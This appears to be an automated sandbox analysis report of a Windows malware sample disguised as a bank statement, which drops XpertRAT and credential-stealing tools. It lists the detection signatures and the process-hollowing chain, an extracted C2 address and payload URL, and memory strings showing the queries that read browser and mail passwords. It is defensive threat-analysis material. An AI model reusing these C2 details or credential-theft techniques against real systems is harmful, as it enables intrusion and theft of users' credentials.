Loading ...

Play interactive tourEdit tour

Windows Analysis Report Statement from QNB.exe

Overview

General Information

Sample Name:Statement from QNB.exe
Analysis ID:527846
MD5:9c8b626668e14aeb4355ea39d1520e33
SHA1:554069b1fb3a80a02840158d31c6c2826812cb40
SHA256:d63ed0450efe28d525954d84556394f21df1c2d882e74b4891492fefab00dd79
Infos:

Most interesting Screenshot:

Detection

GuLoader MailPassView XpertRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Yara detected Generic Dropper
Yara detected MailPassView
Yara detected XpertRAT
Malicious sample detected (through community Yara rule)
GuLoader behavior detected
Yara detected GuLoader
Hides threads from debuggers
Sample uses process hollowing technique
Writes to foreign memory regions
Tries to detect Any.run
Yara detected VB6 Downloader Generic
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Disables user account control notifications
Tries to steal Mail credentials (via file registry)
Changes security center settings (notifications, updates, antivirus, firewall)
Allocates memory in foreign processes
Injects a PE file into a foreign processes
Yara detected WebBrowserPassView password recovery tool
Creates an undocumented autostart registry key
C2 URLs / IPs found in malware configuration
Creates autostart registry keys with suspicious names
Disables UAC (registry)
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality for execution timing, often used to detect debuggers
Abnormal high CPU Usage
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Installs a raw input device (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
Extensive use of GetProcAddress (often used to hide API calls)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64native
  • Statement from QNB.exe (PID: 1112 cmdline: "C:\Users\user\Desktop\Statement from QNB.exe" MD5: 9C8B626668E14AEB4355EA39D1520E33)
    • Statement from QNB.exe (PID: 3232 cmdline: "C:\Users\user\Desktop\Statement from QNB.exe" MD5: 9C8B626668E14AEB4355EA39D1520E33)
      • iexplore.exe (PID: 1736 cmdline: C:\Users\user\Desktop\Statement from QNB.exe MD5: BBF55D48A97497F61781C226E1CEDE6A)
        • iexplore.exe (PID: 2300 cmdline: /stext "C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\nyuimqkss0.txt" MD5: BBF55D48A97497F61781C226E1CEDE6A)
        • iexplore.exe (PID: 3544 cmdline: /stext "C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\nyuimqkss1.txt" MD5: BBF55D48A97497F61781C226E1CEDE6A)
        • iexplore.exe (PID: 2448 cmdline: /stext "C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\nyuimqkss2.txt" MD5: BBF55D48A97497F61781C226E1CEDE6A)
        • iexplore.exe (PID: 1968 cmdline: /stext "C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\nyuimqkss3.txt" MD5: BBF55D48A97497F61781C226E1CEDE6A)
        • iexplore.exe (PID: 5684 cmdline: /stext "C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\nyuimqkss4.txt" MD5: BBF55D48A97497F61781C226E1CEDE6A)
  • D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe (PID: 6972 cmdline: "C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe" MD5: 9C8B626668E14AEB4355EA39D1520E33)
    • D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe (PID: 6920 cmdline: "C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe" MD5: 9C8B626668E14AEB4355EA39D1520E33)
  • D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe (PID: 8036 cmdline: "C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe" MD5: 9C8B626668E14AEB4355EA39D1520E33)
    • D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe (PID: 4052 cmdline: "C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe" MD5: 9C8B626668E14AEB4355EA39D1520E33)
  • D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe (PID: 7432 cmdline: "C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe" MD5: 9C8B626668E14AEB4355EA39D1520E33)
    • D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe (PID: 1316 cmdline: "C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe" MD5: 9C8B626668E14AEB4355EA39D1520E33)
  • cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "https://drive.google.com/uc?export=download&id=1y{\\"}

Threatname: XpertRAT

{"C2 list": ["z1s.us.to:5344"], "Mutex": "D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4", "Group": "Test", "Name": "Xpert", "Version": "3.0.10", "Password": "root"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000C.00000003.81136331884.0000000005E20000.00000004.00000001.sdmpJoeSecurity_MailPassViewYara detected MailPassViewJoe Security
    00000004.00000003.81011749898.000000001F3B1000.00000004.00000001.sdmpLokiBot_Dropper_Packed_R11_Feb18Auto-generated rule - file scan copy.pdf.r11Florian Roth
    • 0xa660:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
    00000004.00000003.81011749898.000000001F3B1000.00000004.00000001.sdmpJoeSecurity_GenericDropperYara detected Generic DropperJoe Security
      00000004.00000003.81011749898.000000001F3B1000.00000004.00000001.sdmpJoeSecurity_XpertRATYara detected XpertRATJoe Security
        00000011.00000000.81146013196.0000000000400000.00000040.00000001.sdmpJoeSecurity_WebBrowserPassViewYara detected WebBrowserPassView password recovery toolJoe Security
          Click to see the 47 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          16.0.iexplore.exe.400000.1.unpackJoeSecurity_MailPassViewYara detected MailPassViewJoe Security
            16.2.iexplore.exe.400000.0.raw.unpackJoeSecurity_MailPassViewYara detected MailPassViewJoe Security
              12.2.iexplore.exe.400000.0.unpackJoeSecurity_GenericDropperYara detected Generic DropperJoe Security
                12.2.iexplore.exe.400000.0.unpackJoeSecurity_XpertRATYara detected XpertRATJoe Security
                  12.3.iexplore.exe.5f1a8d8.3.unpackJoeSecurity_WebBrowserPassViewYara detected WebBrowserPassView password recovery toolJoe Security
                    Click to see the 45 entries

                    Sigma Overview

                    No Sigma rule has matched

                    Jbx Signature Overview

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection:

                    barindex
                    Found malware configurationShow sources
                    Source: 0000000F.00000002.81297911120.0000000002BE0000.00000040.00000001.sdmpMalware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=download&id=1y{\\"}
                    Source: 12.0.iexplore.exe.400000.3.unpackMalware Configuration Extractor: XpertRAT {"C2 list": ["z1s.us.to:5344"], "Mutex": "D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4", "Group": "Test", "Name": "Xpert", "Version": "3.0.10", "Password": "root"}
                    Source: 12.0.iexplore.exe.400000.3.unpackAvira: Label: TR/Dropper.Gen
                    Source: 12.0.iexplore.exe.400000.2.unpackAvira: Label: TR/Dropper.Gen
                    Source: 16.0.iexplore.exe.400000.1.unpackAvira: Label: SPR/Tool.MailPassView.473
                    Source: 12.2.iexplore.exe.400000.0.unpackAvira: Label: TR/Dropper.Gen
                    Source: 12.0.iexplore.exe.400000.1.unpackAvira: Label: TR/Dropper.Gen
                    Source: 16.0.iexplore.exe.400000.2.unpackAvira: Label: SPR/Tool.MailPassView.473
                    Source: 12.0.iexplore.exe.400000.0.unpackAvira: Label: TR/Dropper.Gen
                    Source: 12.0.iexplore.exe.400000.4.unpackAvira: Label: TR/Dropper.Gen
                    Source: 16.0.iexplore.exe.400000.0.unpackAvira: Label: SPR/Tool.MailPassView.473
                    Source: 16.0.iexplore.exe.400000.3.unpackAvira: Label: SPR/Tool.MailPassView.473
                    Source: 16.0.iexplore.exe.400000.4.unpackAvira: Label: SPR/Tool.MailPassView.473
                    Source: 16.0.iexplore.exe.400000.5.unpackAvira: Label: SPR/Tool.MailPassView.473
                    Source: Statement from QNB.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                    Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.11.20:49804 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 142.250.186.97:443 -> 192.168.11.20:49805 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.11.20:49827 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 142.250.186.97:443 -> 192.168.11.20:49828 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 172.217.168.14:443 -> 192.168.11.20:49829 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.11.20:49831 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 142.250.186.97:443 -> 192.168.11.20:49832 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.11.20:49834 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 142.250.186.97:443 -> 192.168.11.20:49835 version: TLS 1.2
                    Source: Binary string: z:\Projects\VS2005\mspass\Release\mspass.pdb source: iexplore.exe, iexplore.exe, 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp
                    Source: Binary string: f:\Projects\VS2005\mailpv\Release\mailpv.pdb source: iexplore.exe, iexplore.exe, 00000010.00000000.81129202432.0000000000400000.00000040.00000001.sdmp, iexplore.exe, 00000010.00000000.81127160331.0000000000400000.00000040.00000001.sdmp, iexplore.exe, 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp
                    Source: Binary string: f:\Projects\VS2005\Dialupass\Release\Dialupass.pdb source: iexplore.exe, iexplore.exe, 00000014.00000000.81194973126.0000000000400000.00000040.00000001.sdmp, iexplore.exe, 00000014.00000002.81199952690.0000000000400000.00000040.00000001.sdmp, iexplore.exe, 00000014.00000000.81193951260.0000000000400000.00000040.00000001.sdmp
                    Source: Binary string: c:\Projects\VS2005\WebBrowserPassView\Release\WebBrowserPassView.pdb source: iexplore.exe, iexplore.exe, 00000011.00000000.81146013196.0000000000400000.00000040.00000001.sdmp, iexplore.exe, 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, iexplore.exe, 00000011.00000000.81142234954.0000000000400000.00000040.00000001.sdmp
                    Source: Binary string: .pdba source: iexplore.exe, 0000000C.00000003.81100972595.0000000005EA1000.00000004.00000001.sdmp
                    Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 14_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,14_2_00407898
                    Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 16_2_00406EC3 FindFirstFileA,FindNextFileA,strlen,strlen,16_2_00406EC3
                    Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 17_2_00408752 FindFirstFileW,FindNextFileW,wcslen,wcslen,17_2_00408752
                    Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 17_2_004080D9 FindFirstFileW,FindNextFileW,FindClose,17_2_004080D9
                    Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 18_2_0040423A FindFirstFileA,FindNextFileA,18_2_0040423A
                    Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 20_2_0040537B FindFirstFileW,FindNextFileW,wcslen,wcslen,20_2_0040537B

                    Networking:

                    barindex
                    C2 URLs / IPs found in malware configurationShow sources
                    Source: Malware configuration extractorURLs: https://drive.google.com/uc?export=download&id=1y{\
                    Source: Malware configuration extractorURLs: z1s.us.to:5344
                    Source: Joe Sandbox ViewASN Name: DATACENTERRO DATACENTERRO
                    Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                    Source: global trafficTCP traffic: 192.168.11.20:49806 -> 194.85.248.156:5344
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: iexplore.exe, 0000000C.00000003.81135483040.0000000005EC5000.00000004.00000001.sdmp, iexplore.exe, 0000000C.00000003.81173119870.0000000005F1A000.00000004.00000001.sdmp, iexplore.exe, 00000011.00000000.81146013196.0000000000400000.00000040.00000001.sdmp, iexplore.exe, 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, iexplore.exe, 00000011.00000000.81142234954.0000000000400000.00000040.00000001.sdmpString found in binary or memory: @nss3.dllSOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\seamonkey.exe%programfiles%\Sea MonkeySOFTWARE\Mozillamozilla%s\binPathToExe%programfiles%\Mozilla FirefoxloginshostnameencryptedUsernameencryptedPasswordusernameFieldpasswordFieldhttpRealmnullSELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins.---signons.txtsignons2.txtsignons3.txtsignons.sqlitelogins.jsonnetmsg.dllUnknown Error\Error %d: %seditkernel32.dll... open %2.2X %s (%s)Microsoft_WinInetMicrosoft_WinInet_c7@dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
                    Source: iexplore.exe, 0000000C.00000003.81135483040.0000000005EC5000.00000004.00000001.sdmp, iexplore.exe, 0000000C.00000003.81173119870.0000000005F1A000.00000004.00000001.sdmp, iexplore.exe, 00000011.00000000.81146013196.0000000000400000.00000040.00000001.sdmp, iexplore.exe, 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, iexplore.exe, 00000011.00000000.81142234954.0000000000400000.00000040.00000001.sdmpString found in binary or memory: @nss3.dllSOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\seamonkey.exe%programfiles%\Sea MonkeySOFTWARE\Mozillamozilla%s\binPathToExe%programfiles%\Mozilla FirefoxloginshostnameencryptedUsernameencryptedPasswordusernameFieldpasswordFieldhttpRealmnullSELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins.---signons.txtsignons2.txtsignons3.txtsignons.sqlitelogins.jsonnetmsg.dllUnknown Error\Error %d: %seditkernel32.dll... open %2.2X %s (%s)Microsoft_WinInetMicrosoft_WinInet_c7@dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
                    Source: iexplore.exe, 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
                    Source: iexplore.exe, 00000011.00000003.81166493558.000000000387B000.00000004.00000001.sdmp, iexplore.exe, 00000011.00000003.81166329896.000000000387B000.00000004.00000001.sdmp, iexplore.exe, 00000011.00000002.81171103182.000000000387B000.00000004.00000001.sdmpString found in binary or memory: amingoverlay:///ms-gamingoverlay://kglcheck/https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/logint equals www.facebook.com (Facebook)
                    Source: iexplore.exe, 00000011.00000003.81166493558.000000000387B000.00000004.00000001.sdmp, iexplore.exe, 00000011.00000003.81166329896.000000000387B000.00000004.00000001.sdmp, iexplore.exe, 00000011.00000002.81171103182.000000000387B000.00000004.00000001.sdmpString found in binary or memory: amingoverlay:///ms-gamingoverlay://kglcheck/https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/logint equals www.yahoo.com (Yahoo)
                    Source: iexplore.exe, iexplore.exe, 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
                    Source: iexplore.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
                    Source: bhvD2BB.tmp.17.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
                    Source: Statement from QNB.exe, 00000004.00000003.80970084976.000000000088D000.00000004.00000001.sdmp, Statement from QNB.exe, 00000004.00000002.81018482063.000000000088D000.00000004.00000020.sdmp, Statement from QNB.exe, 00000004.00000003.80966375673.000000000088D000.00000004.00000001.sdmp, Statement from QNB.exe, 00000004.00000003.80961766607.000000000088D000.00000004.00000001.sdmp, Statement from QNB.exe, 00000004.00000003.80967593583.000000000088D000.00000004.00000001.sdmp, Statement from QNB.exe, 00000004.00000003.80961024720.000000000088D000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000002.81499259133.00000000008DC000.00000004.00000020.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000019.00000002.81578179889.0000000000A10000.00000004.00000020.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000002.81651530540.00000000006E0000.00000004.00000020.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                    Source: iexplore.exe, 0000000C.00000003.81135483040.0000000005EC5000.00000004.00000001.sdmp, iexplore.exe, 0000000C.00000003.81173119870.0000000005F1A000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/COMODOCodeSigningCA2.crl0r
                    Source: Statement from QNB.exe, 00000004.00000003.80970084976.000000000088D000.00000004.00000001.sdmp, Statement from QNB.exe, 00000004.00000002.81018482063.000000000088D000.00000004.00000020.sdmp, Statement from QNB.exe, 00000004.00000003.80966375673.000000000088D000.00000004.00000001.sdmp, Statement from QNB.exe, 00000004.00000003.80961766607.000000000088D000.00000004.00000001.sdmp, Statement from QNB.exe, 00000004.00000003.80967593583.000000000088D000.00000004.00000001.sdmp, Statement from QNB.exe, 00000004.00000003.80961024720.000000000088D000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000002.81499259133.00000000008DC000.00000004.00000020.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000019.00000002.81578179889.0000000000A10000.00000004.00000020.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000002.81651530540.00000000006E0000.00000004.00000020.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                    Source: bhvD2BB.tmp.17.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
                    Source: bhvD2BB.tmp.17.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
                    Source: iexplore.exe, 0000000C.00000003.81135483040.0000000005EC5000.00000004.00000001.sdmp, iexplore.exe, 0000000C.00000003.81173119870.0000000005F1A000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                    Source: bhvD2BB.tmp.17.drString found in binary or memory: http://ocsp.digicert.com0
                    Source: iexplore.exe, iexplore.exe, 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmpString found in binary or memory: http://www.ebuddy.com
                    Source: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000003.81488930602.0000000000955000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000003.81495319894.0000000000955000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000002.81500013187.0000000000955000.00000004.00000020.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000003.81488546638.000000000093B000.00000004.00000001.sdmpString found in binary or memory: http://www.google.com/support/accounts/answer/151657?hl=en
                    Source: iexplore.exe, iexplore.exe, 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, iexplore.exe, 0000000E.00000003.81114391201.00000000032CD000.00000004.00000001.sdmp, iexplore.exe, 0000000E.00000003.81114359568.00000000032CD000.00000004.00000001.sdmpString found in binary or memory: http://www.imvu.com
                    Source: iexplore.exe, 0000000E.00000002.81115436732.00000000007C9000.00000004.00000001.sdmpString found in binary or memory: http://www.imvu.com/
                    Source: iexplore.exe, 0000000E.00000003.81114391201.00000000032CD000.00000004.00000001.sdmp, iexplore.exe, 0000000E.00000003.81114359568.00000000032CD000.00000004.00000001.sdmpString found in binary or memory: http://www.imvu.comata
                    Source: iexplore.exe, 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
                    Source: iexplore.exe, 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmpString found in binary or memory: http://www.imvu.comr
                    Source: iexplore.exe, iexplore.exe, 00000014.00000000.81194973126.0000000000400000.00000040.00000001.sdmp, iexplore.exe, 00000014.00000002.81199952690.0000000000400000.00000040.00000001.sdmp, iexplore.exe, 00000014.00000000.81193951260.0000000000400000.00000040.00000001.sdmpString found in binary or memory: http://www.nirsoft.net/
                    Source: Statement from QNB.exe, 00000004.00000003.80961383094.00000000008C3000.00000004.00000001.sdmp, Statement from QNB.exe, 00000004.00000003.80962048215.00000000008C3000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000003.81485897734.0000000000955000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000019.00000003.81568642879.0000000000A93000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000019.00000003.81572159339.0000000000A92000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000019.00000003.81571978022.0000000000A86000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000003.81643405594.0000000000741000.00000004.00000001.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/drive-explorer/
                    Source: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000003.81491679427.0000000000955000.00000004.00000001.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentSignerHttp/external
                    Source: Statement from QNB.exe, 00000004.00000003.80961383094.00000000008C3000.00000004.00000001.sdmp, Statement from QNB.exe, 00000004.00000003.80962048215.00000000008C3000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000003.81485897734.0000000000955000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000019.00000003.81568642879.0000000000A93000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000019.00000003.81572159339.0000000000A92000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000019.00000003.81571978022.0000000000A86000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000003.81643405594.0000000000741000.00000004.00000001.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/report-to/gse_l9ocaq
                    Source: Statement from QNB.exe, 00000004.00000003.80967593583.000000000088D000.00000004.00000001.sdmpString found in binary or memory: https://doc-00-5k-docs.googleusercontent.com/
                    Source: Statement from QNB.exe, 00000004.00000002.81018352703.000000000087F000.00000004.00000020.sdmpString found in binary or memory: https://doc-00-5k-docs.googleusercontent.com/%%doc-00-5k-docs.googleusercontent.com
                    Source: Statement from QNB.exe, 00000004.00000003.80962048215.00000000008C3000.00000004.00000001.sdmp, Statement from QNB.exe, 00000004.00000002.81018228293.0000000000871000.00000004.00000020.sdmpString found in binary or memory: https://doc-00-5k-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/9ika2j8t
                    Source: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000002.81651530540.00000000006E0000.00000004.00000020.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000002.81652133637.0000000000741000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000003.81648906007.0000000000741000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000003.81643405594.0000000000741000.00000004.00000001.sdmpString found in binary or memory: https://doc-0k-48-docs.googleusercontent.com/
                    Source: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000019.00000002.81578179889.0000000000A10000.00000004.00000020.sdmpString found in binary or memory: https://doc-0k-48-docs.googleusercontent.com/%%doc-0k-48-docs.googleusercontent.com
                    Source: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000019.00000002.81578885460.0000000000A95000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000019.00000003.81572159339.0000000000A92000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000019.00000003.81571978022.0000000000A86000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000019.00000003.81574632157.0000000000A95000.00000004.00000001.sdmpString found in binary or memory: https://doc-0k-48-docs.googleusercontent.com/3
                    Source: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000019.00000002.81578179889.0000000000A10000.00000004.00000020.sdmpString found in binary or memory: https://doc-0k-48-docs.googleusercontent.com/Od
